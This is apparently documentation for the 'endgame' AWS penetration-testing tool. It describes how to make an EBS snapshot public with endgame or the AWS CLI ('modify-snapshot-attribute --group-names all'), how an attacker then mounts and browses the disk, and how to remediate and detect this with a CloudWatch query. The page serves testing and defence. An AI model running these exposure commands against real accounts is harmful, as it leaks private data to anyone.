Skip to content

EBS Snapshot Exposure

Steps to Reproduce

  • To expose the resource using endgame, run the following from the victim account:
export EVIL_PRINCIPAL=*
export SNAPSHOT_ID=snap-1234567890abcdef0

endgame expose --service ebs --name $SNAPSHOT_ID
  • To expose the resource using the AWS CLI, run the following from the victim account:
export SNAPSHOT_ID=snap-1234567890abcdef0

aws ec2 modify-snapshot-attribute \
    --snapshot-id $SNAPSHOT_ID \
    --attribute createVolumePermission \
    --operation-type add \
    --group-names all
  • To verify that the snapshot has been shared with the public, run the following from the victim account:
export SNAPSHOT_ID=snap-1234567890abcdef0

aws ec2 describe-snapshot-attribute \
    --snapshot-id $SNAPSHOT_ID \
    --attribute createVolumePermission
  • Observe that the contents match the example shown below.

Example

The response of aws ec2 describe-snapshot-attribute will match the below, indicating that the EBS snapshot is public.

{
    "SnapshotId": "snap-066877671789bd71b",
    "CreateVolumePermissions": [
        {
            "Group": "all"
        }
    ]
}

Exploitation

After an EBS Snapshot is made public, an attacker can then: * copy the public snapshot to their own account * Use the snapshot to create an EBS volume * Attach the EBS volume to their own EC2 instance and browse the contents of the disk, potentially revealing sensitive or otherwise non-public information.

Remediation

‼️ Note: At the time of this writing, AWS Access Analyzer does NOT support auditing of this resource type to prevent resource exposure. We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool. 😊

  • Encrypt all Snapshots with Customer-Managed Keys: Follow the encryption-related recommendations in the Prevention Guide
  • Trusted Accounts Only: Ensure that EBS Snapshots are only shared with trusted accounts, and that the trusted accounts truly need access to the EBS Snapshot.
  • Ensure access is necessary: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
  • Restrict access to IAM permissions that could lead to exposure of your EBS Snapshots: Tightly control access to the following IAM actions:

Also, consider using Cloudsplaining to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report here

Basic Detection

The following CloudWatch Log Insights query will include exposure actions taken by endgame:

fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ec2.amazonaws.com' and (eventName='ModifySnapshotAttribute' and requestParameters.attributeType='CREATE_VOLUME_PERMISSION') 

This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.

References